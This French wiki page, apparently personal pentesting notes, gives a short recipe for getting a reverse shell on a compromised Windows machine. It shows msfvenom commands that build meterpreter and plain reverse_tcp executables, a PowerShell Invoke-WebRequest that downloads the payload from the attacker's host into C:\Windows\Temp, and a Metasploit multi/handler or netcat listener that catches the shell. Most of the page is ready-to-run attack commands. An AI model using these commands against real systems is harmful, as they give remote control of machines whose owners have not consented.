Reverse Shell

Windows Metasploit

Une fois un premier shell obtenu sous windows, il est possible d'en obtenir un meilleur qui soit plus stable.

Pour cela on commence par créer un payload avec msfvenom :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip-kali> LPORT=<port-kali> -f exe -o rev.exe

Une fois le payload créé, on l'upload sur notre machine pour cela on lance un serveur (ex avec python)

python3 -m http.server 1234

Sur la machine Windows, on demande l'upload de notre payload dans le dossier Temp:

powershell -c "Invoke-WebRequest -Uri 'http://<ip-kali>:<port-kali>/rev.exe' -OutFile 'C:\Windows\Temp\rev.exe'"

On lance msfconsole avec les paramètres suivants :

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <ip-kali>
set LPORT <port-kali>
run

Puis on lance notre payload sur la machine windows :

./rev.exe

Windows sans metasploit

Pour cela on commence par créer un payload avec msfvenom :

msfvenom -p windows/shell_reverse_tcp LHOST=<ip-kali> LPORT=<port-kali> -f exe -o rev.exe

Une fois le payload créé, on l'upload sur notre machine pour cela on lance un serveur (ex avec python)

python3 -m http.server 1234

Sur la machine Windows, on demande l'upload de notre payload dans le dossier Temp:

powershell -c "Invoke-WebRequest -Uri 'http://<ip-kali>:<port-kali>/rev.exe' -OutFile 'C:\Windows\Temp\rev.exe'"

On lance notre écoute :

nc -nlvp 7777

Puis on lance notre payload sur la machine windows :

./rev.exe

Revision #2
Created 17 April 2022 10:21:52 by White Rose
Updated 18 April 2022 15:23:00 by White Rose